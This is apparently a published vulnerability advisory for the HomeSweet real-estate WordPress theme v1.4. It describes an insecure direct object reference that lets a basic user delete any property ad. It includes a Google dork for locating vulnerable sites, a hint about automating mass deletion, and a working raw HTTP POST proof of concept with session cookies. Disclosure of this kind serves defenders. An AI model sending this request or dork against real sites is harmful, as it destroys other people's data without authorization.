HomeSweet - Real Estate WordPress Theme v1.4 - IDOR leading to arbitrary deletion of ads

2020.07.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-639

[+] Exploit Title: HomeSweet - Real Estate WordPress Theme v1.4 - IDOR leading to arbitrary deletion of ads [+] Google Dork: inurl:/wp-content/themes/homesweet/ [+] Date: 2020-06-17 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: ApusTheme [ https://themeforest.net/user/apustheme ] [+] Software Version: 1.4 [+] Software Link: https://themeforest.net/item/homesweet-real-estate-wordpress-theme/20560953 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-639 ### [ Info: ] [i] IDOR leading to arbitrary deletion of ads vulnerability was discovered in the HomeSweet Real Estate theme through 1.4 for WordPress. [i] Basic user account: vladvector / vector (login / password) [i] You need to know the unique ID of the page you want to delete, unless you are going to automate the process and delete everything at all. To find out the unique ID of any page, you should check the <body> tag -> class «postid-XXXX», where XXXX == unique page ID. ### [ PoC: ] [!] POST /homesweet/my-properties/ HTTP/1.1 Host: demoapus.com Content-Type: application/x-www-form-urlencoded Content-Length: 38 Origin: https://demoapus.com Referer: https://demoapus.com/homesweet/remove-property/?id=2769 Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4a2f61dbe4052069fd7f20535e969bfa=vladvector%7C1592611943%7ChQcnlgehpsVMZNAWEc3mV7cpWnbxanBcHN9EpQQ7OLj%7C15f5fb0a9060ba32a5ac300e3d7bf2cbd00e4a039972fe87693eec0abef6ba16; __cfduid=d07a8a08f37a610559150403054bdcae31592415303; redux_blast=1592425112; PHPSESSID=9cbohsp0eo720ke2nuebbvau36; apus_preset=1547539960; hidde_popup_newsletter=1; homesweet_recently_viewed=3724%7C3725%7C3076%7C2089 property_id=2769&remove_property_form= ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector

Referencje:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-06-17-homesweet-real-estate-wordpress-theme-v1-4.txt
https://themeforest.net/item/homesweet-real-estate-wordpress-theme/20560953


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top